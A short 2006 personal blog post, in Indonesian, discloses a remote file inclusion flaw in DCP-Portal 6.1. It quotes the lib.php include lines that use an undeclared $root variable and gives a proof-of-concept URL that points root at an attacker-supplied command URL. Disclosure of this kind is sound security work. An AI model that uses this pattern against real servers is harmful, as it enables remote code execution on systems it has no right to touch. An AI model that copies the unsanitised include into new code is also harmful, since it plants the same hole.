:: LasT_CoFFiN Was Here ::

Gw orangnya aga gemuk, item (tau manis tau ga neh..!! hehe), disinilah Tempat Gw mencurahkan perasaan dan saling berbagi..!!

Wednesday, June 14, 2006

DCP-Portal version 6.1 command execution

dcp-portal tidak bisa mendeklarasikan root variabel kedalam file lib.php, sehingga mengijinkan attackers untuk mengeksekusi code PHP.

Code Snips:
Error occured in lib.php, line 4/7:

include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");

variable $root is not declared.

Proof of Concept:
http://example/[dp_path]/library/lib.php?root=[cmd_url]

posted by Evan Jaelani @ 1:37 AM 

0 Comments:

Post a Comment

<< Home